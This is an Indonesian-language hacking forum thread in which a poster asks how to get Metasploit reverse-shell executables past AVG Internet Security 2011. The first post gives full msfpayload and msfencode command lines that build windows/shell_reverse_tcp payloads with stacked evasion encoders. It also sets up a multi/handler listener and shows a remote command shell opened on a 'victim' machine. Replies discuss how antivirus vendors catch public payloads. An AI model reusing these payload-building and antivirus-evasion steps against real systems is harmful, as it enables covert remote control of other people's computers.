[HELEP] bypass AVG IS 2011 dengan windows/shell_reverse_tcp
#1
bukan nya g taw ada thread tentang bypass av avira,,tapi ni om berbeda tipe payloads dengan om red-dragon yang memakai meterpreter dan vanish.sh,

menurut sumber payload nya memakai windows/shell_reverse_tcp dan windows/shell/reverse_tcp yang dibuat .exe

tapi ane mau tanya nih om,,karena hasil yang ane kerjakan menurut sumber sebanyak 4 kali, tetep payloads 7.exe kebabat sama avg is 2011 ane,,
for sumber disini nih,,

masalah ane dimari bro
ok giliran ane ngetes pake AVG Internet Security 2011 Full Version

ane coba langsung bikin 3 payloads nih dan langsung memindahkannya ke komputer korban yang ber av kan AVG IS 2011 pro,,

Quote:root@bt:/pentest/exploits/framework# msfpayload windows/shell_reverse_tcp LHOST=192.168.43.187 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)



root@bt:/pentest/exploits/framework# file /tmp/2.exe

/tmp/2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit



root@bt:/pentest/exploits/framework# msfpayload windows/shell_reverse_tcp LHOST=192.168.43.187 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /tmp/6.exe



root@bt:/pentest/exploits/framework# msfpayload windows/shell/reverse_tcp LHOST=192.168.43.187 LPORT=31337 X > /tmp/7.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/shell/reverse_tcp

Length: 290

Options: {"LHOST"=>"192.168.43.187", "LPORT"=>"31337"}

lanjut copykan, hehehe



ini dia hasil jalankan backup payloads 2 yang gak kebabat sama avg ane(payloads 2 yang pertama buat)

Spoiler! :


root@bt:/pentest/exploits/framework# ./msfconsole



______________________________________________________________________________

| |

| METASPLOIT CYBER MISSILE COMMAND V4 |

|______________________________________________________________________________|

\ / /

\ . / / x

\ / /

\ / + /

\ + / /

* / /

/ . /

X / / X

/ ###

/ # % #

/ ###

. /

. / . * .

/

*

+ *



^

#### __ __ __ ####### __ __ __ ####

#### / \ / \ / \ ########### / \ / \ / \ ####

################################################################################

################################################################################

# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #

################################################################################







=[ metasploit v4.0.0-release [core:4.0 api:1.0]

+ -- --=[ 716 exploits - 361 auxiliary - 68 post

+ -- --=[ 226 payloads - 27 encoders - 8 nops

=[ svn r13462 updated 160 days ago (2011.08.01)



Warning: This copy of the Metasploit Framework was last updated 160 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

https://community.rapid7.com/docs/DOC-1306



msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD 192.168.43.187

[-] The value specified for PAYLOAD is not valid.

msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(handler) > set LHOST 192.168.43.187

LHOST => 192.168.43.187

msf exploit(handler) > set LPORT 31337

LPORT => 31337

msf exploit(handler) > exploit



[*] Started reverse handler on 192.168.43.187:31337

[*] Starting the payload handler...

[*] Sending stage (240 bytes) to 192.168.43.96

[*] Command shell session 1 opened (192.168.43.187:31337 -> 192.168.43.96:49240) at 2012-01-08 20:37:52 +0700



Microsoft Windows [Version 6.1.7600]

Copyright © 2009 Microsoft Corporation. All rights reserved.



C:\Users\Acer\Documents>More?

More? more?

more?

'����u�Grojmore?' is not recognized as an internal or external command,

operable program or batch file.



C:\Users\Acer\Documents>ls

ls

'ls' is not recognized as an internal or external command,

operable program or batch file.



C:\Users\Acer\Documents>dir

dir

Volume in drive C has no label.

Volume Serial Number is E2E8-18E4



Directory of C:\Users\Acer\Documents



08/01/2012 07:49 <DIR> .

08/01/2012 07:49 <DIR> ..

08/01/2012 07:29 73.802 2.exe

22/09/2011 15:24 <DIR> kerjaan

12/08/2011 08:49 <DIR> OneNote Notebooks

04/10/2011 11:56 <DIR> PTS DAMSUAR

18/09/2011 08:37 <DIR> Youcam

1 File(s) 73.802 bytes

6 Dir(s) 34.882.576.384 bytes free



C:\Users\Acer\Documents>^C

Abort session 1? [y/N] n

Microsoft Windows [Version 6.1.7600]

Copyright © 2009 Microsoft Corporation. All rights reserved.



C:\Users\Acer\Documents>More? More? more?

'����u�Grojmore?' is not recognized as an internal or external command,

operable program or batch file.



C:\Users\Acer\Documents>ls

'ls' is not recognized as an internal or external command,

operable program or batch file.



C:\Users\Acer\Documents>dir

Volume in drive C has no label.

Volume Serial Number is E2E8-18E4



Directory of C:\Users\Acer\Documents



08/01/2012 07:49 <DIR> .

08/01/2012 07:49 <DIR> ..

08/01/2012 07:29 73.802 2.exe

22/09/2011 15:24 <DIR> kerjaan

12/08/2011 08:49 <DIR> OneNote Notebooks

04/10/2011 11:56 <DIR> PTS DAMSUAR

18/09/2011 08:37 <DIR> Youcam

1 File(s) 73.802 bytes

6 Dir(s) 34.882.576.384 bytes free



C:\Users\Acer\Documents>





curhat bro,,sebenar nya ini yang ke4 kalinya ane coba,,penasaran,,percobaan pertama ane payloads 6.exe dan 7.exe habis dibabat avg ane,,tapi payloads 2.exe kagak kena,,

seharusnya berdasarkan yang ane baca disumber payloads 2 dan 6 yang dibabat dan payloads 7 selamat,, tapi untung ane ada backup file 2 yang selamat, Smile Big Grin

jadi menurut mastah2 gimana??bantuin donk,,ane udah ulang buat payloads 2,6,dan 7 terus kebabat semua sama avg is 2011

for ss ane
[spoiler]
ss avg ane
[Image: 302p9vc.png]
ss hasil scan yang ke 4 kali coba
[Image: 2nbc0np.png]
ss backup payloads 2.exe yang selamat gak kebabat(percobaan pertama)
[Image: 23vhw2g.png]
mhaapt kalo maksa buka thread baru tentang bypass antivirus,,tapi karena ane pikir berbeda type payloads makanya ane buka,,

kalo salah hapus aja om momod atau om mimin Smile

#2
sepi euy,, ngertiin sendiri ajah walaw g ngerti2

#3
klo payload 2.exe bisa lolos berarti ya memang payload 2 bisa bypas AVG IS bro

mengenai payload yg ada di internet itu ga akan bertahan lama karena pastinya perusahaan antivirus mempunyai tim utk mencari payload2 baru biar produknya tetap up to date

apalagi klo buat payload sendiri trus diupload ke virustotal.com dengan hasil bagus 2/36 misalnya, pasti bbrp hari kemudian udh ga bisa lagi bypass di semua antivirus Big Grin

trus shell yg dipake juga meterpreter yg udah sangat dikenal di dunia hehehe
yg paling bagus bikin shell sendiri tapi ane sendiri blom bisa Tongue
coba cek disini aja:
http://packetstormsecurity.org/files/tags/shell/

tapi pelajari dulu yg disini:
http://resources.infosecinstitute.com/sh...sources%29

selamat mencoba2, jangan lupa tidur Smile

#4
(01-09-2012, 01:00 AM)konspirasi Wrote: klo payload 2.exe bisa lolos berarti ya memang payload 2 bisa bypas AVG IS bro

mengenai payload yg ada di internet itu ga akan bertahan lama karena pastinya perusahaan antivirus mempunyai tim utk mencari payload2 baru biar produknya tetap up to date

apalagi klo buat payload sendiri trus diupload ke virustotal.com dengan hasil bagus 2/36 misalnya, pasti bbrp hari kemudian udh ga bisa lagi bypass di semua antivirus Big Grin

trus shell yg dipake juga meterpreter yg udah sangat dikenal di dunia hehehe
yg paling bagus bikin shell sendiri tapi ane sendiri blom bisa Tongue
coba cek disini aja:
http://packetstormsecurity.org/files/tags/shell/

tapi pelajari dulu yg disini:
http://resources.infosecinstitute.com/sh...sources%29

selamat mencoba2, jangan lupa tidur Smile
makasih om konspirasi Smile
kalo ada link2 lagi tambahin yah om Smile

siipp,,ini juga lagi ngerjain tugas web service,,
pending dulu belajar bt5nya,,
kuliah padet banget,,untung aja pas banget ni smster ada administrasi dan keamanan jaringan komputer,,


#5
utk link-link tentang keamanan bisa follow twitter @ikonspirasi atau facebook ane ikonspirasi juga bro Smile

#6
oce masbro,, Smile thanks






Users browsing this thread: 1 Guest(s)